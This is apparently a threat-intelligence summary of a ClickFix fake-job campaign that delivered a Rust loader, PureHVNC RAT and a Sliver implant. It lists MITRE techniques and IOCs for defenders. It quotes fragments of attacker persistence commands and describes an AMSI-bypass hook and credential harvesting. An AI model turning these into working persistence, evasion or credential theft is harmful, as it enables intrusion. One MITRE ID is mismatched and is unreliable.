Under the Pure Curtain: From RAT to Builder to Coder

Check Point Research analyzed a ClickFix campaign that used fake job offers to deliver a Rust loader, PureHVNC RAT (campaign IDs 2a and amazon3), and later a Sliver implant, revealing a coordinated eight-day intrusion and full PureHVNC functionality. The investigation linked supporting GitHub repositories and a PureRAT builder to the PureCoder developer (timezone UTC+0300), exposing development infrastructure and PureCrypter features. #PureHVNC #PureCoder

Keypoints

A ClickFix phishing campaign delivered a PowerShell command that led to malicious JavaScript, persistence, and initial deployment of PureHVNC RAT (C2 54.197.141.245, campaign ID 2a).
On day two the actor deployed a Rust Loader (installed to %APPDATA%MicrosoftSystemCertificates9TwinAPIInterop.pfx) that unpacked a newer PureHVNC RAT (campaign ID amazon3) using Inno Setup.
After a multi-day delay, the operator deployed a Sliver implant from hxxps://jq-scripts.global.ssl[.]fastly[.]net which executed a PowerShell credential-harvesting script storing creds to %ProgramData%/__cred.txt.
Technical analysis of the Rust Loader shows ChaCha20-Poly1305 string decryption, anti-analysis checks (blacklisted processes and WMEmu APIs), AMSI bypass via LdrLoadDll hook, and payload decryption/execution of a .NET PureHVNC payload.
PureHVNC uses protobuf/Gzip/Base64 configuration, SSLStream C2 communication, extensive data collection (AV, system, installed apps, anti-sandbox checks), scheduled task persistence, and a registry-based plugin system with many plugins (HVNC, keylogger, clipper, proxy, DDOS, etc.).
Check Point linked multiple GitHub repositories and commits (UTC+0300 timestamps) to PureCoder, identified developer infrastructure hosting support files (chromedriver, msedgedriver, WebDriver.dll), and discovered a PureRAT builder containing hardcoded GitHub URLs and PureCrypter enums.
The research produced IOCs (file hashes, domains, C2 IP, GitHub accounts) and detailed PureCrypter configuration options, providing operational leads and actionable intelligence for defenders and law enforcement.

MITRE Techniques

[T1204] User Execution – ClickFix phishing page tricked victims into pasting a PowerShell command that executed a malicious JavaScript file (“powershell -c … copied to their clipboard” resulting in download and eval of JS).
[T1059] Command and Scripting Interpreter – PowerShell was used to execute the loader and maintain persistence via scheduled tasks (“powershell -Command … regsvr32.exe {MALWARE} /i:–type=renderer”).
[T1105] Ingress Tool Transfer – PureHVNC bots downloaded supporting files from GitHub URLs delivered by C2 (“the bot received three GitHub URLs containing supporting files … downloaded the related files”).
[T1547] Boot or Logon Autostart Execution – Malware created a Scheduled Task to maintain persistence, mimicking Google Updater (“Register-ScheduledTask … TaskName ‘GoogleUpdaterTaskSystem196.6.2928.90.{…}’”).
[T1574] Hijack Execution Flow – The Rust Loader injects shellcode and executes a .NET payload via RunPE/shellcode after decrypting embedded payload (“creates a heap, copies the decrypted payload buffer into it, and executes the shellcode”).
[T1140] Deobfuscate/Decode Files or Information – Strings and payloads were encrypted and decrypted at runtime (ChaCha20-Poly1305 for strings; XOR and AES+Gzip for payloads) (“encrypted strings … decrypted on demand using the ChaCha20-Poly1305 algorithm”).
[T1529] System Network Configuration Discovery – PureHVNC collects installed antivirus products via WMI queries (“SELECT * FROM AntiVirusProduct”) and other system/app inventory to inform operator actions.
[T1053] Scheduled Task/Job – Persistence implemented via creation of Scheduled Tasks with varying privileges and repetition settings (“Register-ScheduledTask … -RepetitionInterval (New-TimeSpan -Minutes 1)”).
[T1562] Impair Defenses – AMSI bypass implemented by hooking LdrLoadDll in ntdll.dll to prevent amsi.dll from loading (“injecting a hook into the native LdrLoadDll function … prevents it from being loaded”).
[T1189] Drive-by Compromise – Initial infection involved a web page (ClickFix) that automatically copied a command to victim clipboard and induced execution when pasted (“a PowerShell command was automatically copied to their clipboard, delivering a malicious JavaScript file”).

Indicators of Compromise

[IP Address] PureHVNC C2 – 54.197.141.245
[Domains] JavaScript C2 domains used by ClickFix JS – stathub[.]quest, stategiq[.]quest (also mktblend[.]monster, dsgnfwd[.]xyz, dndhub[.]xyz)
[Hashes] Rust Loader and related samples – Rust Loader: 99CBBE5F68D50B79AF8FB748F51794DE137F4FE4; Inno Setup PureHVNC: D340B780194D44EE9B8D32F596B5A13723ABBE1D
[Hashes] PureHVNC samples – First PureHVNC RAT: E3A79CE291546191A5DDB039B2F9BF523BB9C4FB; PureHVNC sample: 34EC79AB8A00DC6908874CDF7762756A2DCA4274 (and 1 more hash)
[GitHub Repositories] Developer/test hosting – hxxps://github[.]com/DFfe9ewf (repos containing chromedriver.exe, msedgedriver.exe, WebDriver.dll); testdev account testdemo345 with similar uploads

SHARE THIS STORY

WhatsApp X (Twitter)Telegram Bluesky Facebook LinkedIn Threads Email Print